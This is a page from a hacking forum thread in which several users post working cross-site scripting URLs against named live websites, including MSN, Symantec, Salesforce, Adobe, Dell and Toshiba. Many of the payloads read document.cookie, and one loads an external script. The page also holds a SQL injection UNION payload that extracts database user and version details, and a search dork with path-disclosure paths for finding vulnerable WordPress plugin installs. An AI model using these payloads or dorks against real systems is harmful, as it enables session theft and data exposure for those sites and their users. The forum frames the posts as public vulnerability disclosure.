Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...5556575859606162636465Next
Current Page: 64 of 65
Re: So it begins
Posted by: Fugitif
Date: June 14, 2010 09:39AM

NitroSecurity

http://nitrosecurity.com/reset-password?destination="><script>alert(/XSS/)</script>

http://security-sh3ll.blogspot.com/

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: July 06, 2010 09:43AM

http://computer.de.msn.com/microsoft/windowslive/bilder.aspx?cp-documentid=153872687&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://news.de.msn.com/politik/bilder.aspx?cp-documentid=151626105&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://wissen.de.msn.com/bilder.aspx?cp-documentid=149972970&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://money.de.msn.com/aktien/bilder.aspx?cp-documentid=151693088&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://sport.de.msn.com/mehr_sport/bilder.aspx?cp-documentid=149936772&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://rubrik.ch.msn.com/reportagen/diebestenbilderdesjahrzehnts.aspx?cp-documentid=151195126&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://style.no.msn.com/nyheter/galleri.aspx?cp-documentid=153049228&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://channels.se.msn.com/kungligt/bildspel.aspx?cp-documentid=153854453&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://viaggi.it.msn.com/fotogallery/foto-estero.aspx?cp-documentid=151815851&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://underholdning.no.msn.com/alice-in-wonderland/galleri.aspx?cp-documentid=152510323&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://lifestyle.de.msn.com/bilder.aspx?cp-documentid=149807353&page=false,false,false%29%3B%7D%29;%20alert(1%29;%20//

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: July 08, 2010 04:57PM

http://d66.org/html/index_done.php?url=<script>alert(1);</script>&short_url=<script>alert(1);</script>

http://recaq.com/html/index_done.php?url=<script>alert(1);</script>&short_url=<script>alert(1);</script>

http://itt.im/html/index_done.php?url=<script>alert(1);</script>&short_url=<script>alert(1);</script>

http://bityurl.com/html/index_done.php?url=<script>alert(1);</script>&short_url=<script>alert(1);</script>

http://zisi.eu/html/index_done.php?url=<script>alert(1);</script>&short_url=<script>alert(1);</script>

http://ysht.tk/2/html/index_done.php?url=<script>alert(1);</script>&short_url=<script>alert(1);</script>

http://m.gavsta.com/html/index_done.php?url=<script>alert(1);</script>&short_url=<script>alert(1);</script>

due to this vulnerability
http://code.google.com/p/phurl/issues/detail?id=68

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: July 10, 2010 08:07PM

and all these, same vulnerability
http://d66.org/index.php/%22><script>alert(1);</script>
http://sa.feurl.com/index.php/%22><script>alert(1);</script>
http://recaq.com/index.php/%22><script>alert(1);</script>
http://linq.tk/index.php/%22><script>alert(1);</script>
http://xn--a-nga.eu/index.php/%22><script>alert(1);</script>
http://www.8u.com/index.php/%22><script>alert(1);</script>
http://ho.io/index.php/%22><script>alert(1);</script>
http://itt.im/index.php/%22><script>alert(1);</script>
http://www.scottfowles.net/phurl/index.php/%22><script>alert(1);</script>
http://wp.nu/index.php/%22><script>alert(1);</script>
http://go.ericjess.com/index.php/%22><script>alert(1);</script>
http://xpnd.us/index.php/%22><script>alert(1);</script>
http://chrl.nl/index.php/%22><script>alert(1);</script>
http://urlmx.co.cc/index.php/%22><script>alert(1);</script>
http://fedl.info/index.php/%22><script>alert(1);</script>
http://www.urlite.de/index.php/%22><script>alert(1);</script>
http://zisi.eu/index.php/%22><script>alert(1);</script>
http://ip.ru/index.php/%22><script>alert(1);</script>
http://www.rzr.im/index.php/%22><script>alert(1);</script>
http://www.urlite.de/index.php/%22><script>alert(1);</script>

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: August 05, 2010 06:28AM

CSO Online - Security and Risk XSS

http://www.csoonline.com/article/592818/the-hackid-conference-a-kid-friendly-idea-whose-time-has-come?source="><script>alert(String.fromCharCode(88,83,83))</script>

SearchSecurity.techtarget.com

http://searchsecuritychannel.techtarget.com/googleResults/1,296420,sid97,00.html?query="><script>alert(String.fromCharCode(88,83,83))</script>

http://security-sh3ll.blogspot.com/

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: August 09, 2010 06:53AM

CRM - Salesforce.com

http://www.salesforce.com/customers/?viewType="<marquee><img src=k onerror=alert("XSS") />

http://security-sh3ll.blogspot.com/

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: August 09, 2010 03:19PM

Symantec

http://www.symantec.com/avcenter/cgi-bin/nisurl.cgi?lang=fr&unblock="><script>alert(String.fromCharCode(88,83,83))</script>

http://seer.entsupport.symantec.com/email_forms/site_feedbck.asp?ddProduct="><script>alert(String.fromCharCode(88,83,83))</script>

http://security-sh3ll.blogspot.com/

Options: ReplyQuote
Re: So it begins
Posted by: Reiners
Date: August 13, 2010 03:44PM

Russian social network (maybe fake)

http://vkonutakte.ru/login.php?u=2&to=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: August 14, 2010 06:36AM

Mashable – The Social Media Guide

http://m.mashable.com/search?q="><script>alert(document.cookie)</script>

http://www.mashable.com/owa/votes?v=</script>'"><marquee><h1>"><script>alert("XSS")</script></h1></marquee>

http://security-sh3ll.blogspot.com/

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: August 14, 2010 04:09PM

Trustwave - ( RBSLynk Trustwave Certificates )


https://rbslynk.trustwave.com/getdur.php?c=10"><script>alert('XSS')</script>

http://security-sh3ll.blogspot.com/

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: August 15, 2010 02:16PM

VeriSign Securitycenter

https://securitycenter.verisign.com/contents_VRSN_US/orderStatusLearnMore.jsp?&product_name="><script>alert('XSS')</script>

http://security-sh3ll.blogspot.com/

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: August 16, 2010 01:01PM

GFI - Web, Email and Network Security solutions

http://www.gfi.com/cgi-bin/unsubscribe.asp?id="><script>alert(document.cookie)</script>

http://security-sh3ll.blogspot.com/

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: August 17, 2010 01:18PM

Hakin9 - IT Security Magazine


http://hakin9.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://security-sh3ll.blogspot.com/

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: August 18, 2010 04:21AM

M86 Security - Secure Web Gateway - Internet Security and Email Security

http://www.m86security.com/popup.asp?src=/images/diagrams/webmarshal_large.gif&w="><script>alert('XSS')</script>

http://security-sh3ll.blogspot.com/

Options: ReplyQuote
Re: So it begins
Posted by: Gareth Heyes
Date: August 18, 2010 09:54AM

@Fugitif

Are you on some sort of irony spree?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: August 19, 2010 01:06PM

Gareth Heyes Wrote:
-------------------------------------------------------
> @Fugitif
>
> Are you on some sort of irony spree?

why?

http://security-sh3ll.blogspot.com/

Options: ReplyQuote
Re: So it begins
Posted by: Fugitif
Date: August 19, 2010 02:00PM

MSN.COM domain

http://auto.fi.msn.com/page.php?page_id=6&td_id=200800024"><script>alert(document.cookie)</script>
http://recettes.styledevie.ca.msn.com/forum/message.php?id=244090"><script>alert(String.fromCharCode(88,83,83))</script>
http://guide-envies.femmes.fr.msn.com/produit_type.php?id=396&rub=11"><script>alert(document.cookie)</script>
http://horoscope.fr.be.msn.com/index.php/register/fr/abo=7/msg="><iframe src=index.htm

http://security-sh3ll.blogspot.com/

Options: ReplyQuote
Re: So it begins
Posted by: Gareth Heyes
Date: August 19, 2010 04:06PM

@Fugitif

Because you found loads of xss holes in sec companies

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: So it begins
Posted by: lightos
Date: August 24, 2010 01:41AM

hxxp://www.cbc.ca/search/cbc?q=';alert(0);'

Options: ReplyQuote
Re: So it begins
Posted by: lightos
Date: August 26, 2010 10:58AM

hxxp://www.rogers.com/web/Rogers.portal?Ntt=<script>alert(0)</script>&N=&_nfpb=true&_pageLabel=support_results

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: January 10, 2011 07:55PM

http://help.washingtonpost.com/ics/support/search.asp?task=knowledge&pageContentIdentifier=%22%22></a><iframe%20src=%22javascript:alert(1);%22></iframe><b

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: So it begins
Posted by: VMw4r3
Date: January 17, 2011 01:13AM

http://www.racing.ups.com/wp-content/plugins/upsracing/rating-control.php?type=<IFRAME HEIGHT=100% WIDTH=100% src=http://xssed.com>
http://yoseif.host.adobe.com/test.cgi/1<script>alert(document.cookie)</script>

http://niemannross.host.adobe.com/2010csbuDeveloperSummit/mobile/eachPresenter.php?fname=1<script>alert(document.cookie)</script>

http://dublinapps.host.adobe.com/index.php?destUrl="onmouseover=alert(document.cookie)="

http://www.peats.com/cgi-bin/search_v2.cgi?q=1<script>alert(document.cookie);</script> &search=Search

http://www.unionchandlery.ie/shopping_admin/product_details/product.cgi?cat=RADIOS&menu=1<IFRAME HEIGHT=100% WIDTH=100% src=http://xssed.com></iframe>&product=11733&sub=VHFS HANDHELD

http://xmm.esa.int/SYS/include/Mailer/RSSDmail.php?dom="<script>alert(document.cookie);</script>"

http://www.rssd.esa.int/herschel_webapps/1<script>alert(document.cookie);</script>

Options: ReplyQuote
Re: So it begins
Posted by: VMw4r3
Date: January 23, 2011 10:16AM

http://jpstore.dell.com/dfo/config.asp?nav=all&prod=1-->1<SCRIPT>alert(document.cookie)</SCRIPT><MARQUEE BGCOLOR="RED"><H1>XSS XSS XSS</H1></MARQUEE><IFRAME src=http://xssed.com></iframe><!--

http://support1.ap.dell.com/cn/zh/knowledgebase/advanceSearch.asp?CurrentPage=&fileDate=1&findText=1<SCRIPT>alert(document.cookie)</SCRIPT><MARQUEE BGCOLOR="RED"><H1>XSS XSS XSS</H1></MARQUEE><IFRAME src=http://xssed.com></iframe>



Edited 1 time(s). Last edit at 01/23/2011 01:49PM by VMw4r3.

Options: ReplyQuote
Re: So it begins
Posted by: VMw4r3
Date: January 25, 2011 09:29AM

http://sportsillustrated.cnn.com/search/?text=<iframe src%3Djavascript:alert(document.cookie);></iframe>&x=0&y=0

Options: ReplyQuote
Re: So it begins
Posted by: VMw4r3
Date: January 25, 2011 11:08AM

Fugitif Wrote:
-------------------------------------------------------
> Hakin9 - IT Security Magazine
>
>
> http://hakin9.org/app/ajax/www/_cms_menu_ajax?page
> _id=4046&portal_prefix=">alert('XSS')

The same XSS is on all sites on same server.

http://lpmagazine.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://phpsolmag.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://app-review.com/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://sqam.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://isecman.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://konferencje.software.com.pl/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://ffdmag.com/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://bsdmag.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://psdmag.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://photoshopdigitalpainting.com/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://itunderground.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://en.sdjournal.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://media.software.com.pl/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://konferencje.software.com.pl/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://gigacon.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://boston-review.com/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://sdcenter.pl/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

http://magazyn.businesscoachingmag.pl/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>

Options: ReplyQuote
Re: So it begins
Posted by: VMw4r3
Date: February 02, 2011 03:26PM

XSS
[esbr.terra.com.br]
http://esbr.terra.com.br/pro.php?id=1<script>alert(document.cookie);</script><script language=JavaScript src=http://ha.ckers.org/s></script>

Sqli with XSS
[esbr.terra.com.br]
http://esbr.terra.com.br/pro.php?id=1' AND 1=2 UNION SELECT 1,concat_ws(0x3a,user(),database(),@@version,@@datadir),0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293B3C2F7363726970743E,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 and 'x'='x



Edited 2 time(s). Last edit at 02/28/2011 03:43PM by VMw4r3.

Options: ReplyQuote
Re: So it begins
Posted by: VMw4r3
Date: March 16, 2011 01:54PM

http://www.pioneerelectronics.com/PUSA/Search?keywords=<SCRIPT>alert(document.cookie)</SCRIPT>

http://www.pioneer-latin.com/en/search.html
postdata:
searchQuery=<SCRIPT>alert(document.cookie)</SCRIPT>

http://www.pioneerisrael.co.il/Pioneer/search.asp?submit.x=0&submit.y=0&search=<SCRIPT>alert(document.cookie)</SCRIPT>

http://www.pioneer.co.id/general/SearchResult.asp
postdata:
Keyword=%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E&x=0&y=0

http://www.pioneer.ph/general/SearchResult.asp
postdata:
Keyword=%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E&x=0&y=0



Edited 2 time(s). Last edit at 03/16/2011 03:54PM by VMw4r3.

Options: ReplyQuote
Re: So it begins
Posted by: VMw4r3
Date: April 06, 2011 02:01PM

http://groups.adobe.com/index.cfm?event=search.index&keywords="><script>alert(document.cookie)</script>

I think all the *.groups.adobe.com use the same vulnerable script.

http://lawpg.groups.adobe.com/index.cfm?event=search.index&keywords="><script>alert(document.cookie)</script>

--
http://dublinapps.host.adobe.com/se/shared/emailafriend.php?go="><script>alert(document.cookie)</script>

http://niemannross.host.adobe.com/2010csbuDeveloperSummit/mobile/eachSession.php?sessionID="><script>alert(document.cookie)</script>

http://niemannross.host.adobe.com/2010csbuDeveloperSummit/mobile/eachTrack.php?trackID=product"><script>alert(document.cookie)</script>

Options: ReplyQuote
Re: So it begins
Posted by: VMw4r3
Date: May 17, 2011 04:52PM

http://www.toshiba.com/ind/searchresult.jsp?scontains=<script>alert(document.cookie);</script> &x=0&y=0&item=product


This one only works with "<H1>XSS</H1>" tags in it ?

http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/outFrm.jsp?ofId=AskIris&searchString=<SCRIPT>alert(document.cookie)</SCRIPT><H1>XSS</H1>&x=0&y=0

Options: ReplyQuote
Re: So it begins
Posted by: VMw4r3
Date: May 17, 2011 05:53PM

http://justplaingeek.com/blog/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script>

http://justplaingeek.com/blog/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script>

http://blogs.ischool.utexas.edu/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script>

http://elpismedicalcentre.com/blog/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/></script><script>alert(document.cookie)</script>

http://www.sherrymichelle.com/ChaosBlog/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script>

http://www.wiwaf.com/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script>

http://alwayschristiankane.com/home/wp-content/plugins/si-contact-form/captcha-secureimage/test/index.php/"/><script>alert(document.cookie)</script>

Theres loads more...

Dork: inurl:"/si-contact-form/captcha-secureimage/"


Path disclosure:

/wp-content/plugins/si-contact-form/si-contact-form-process.php
/wp-content/plugins/si-contact-form/si-contact-form-admin.php
/wp-content/plugins/si-contact-form/si-contact-form.php
/wp-content/plugins/si-contact-form/si-contact-form-display.php

Options: ReplyQuote
Pages: PreviousFirst...5556575859606162636465Next
Current Page: 64 of 65


Sorry, only registered users may post in this forum.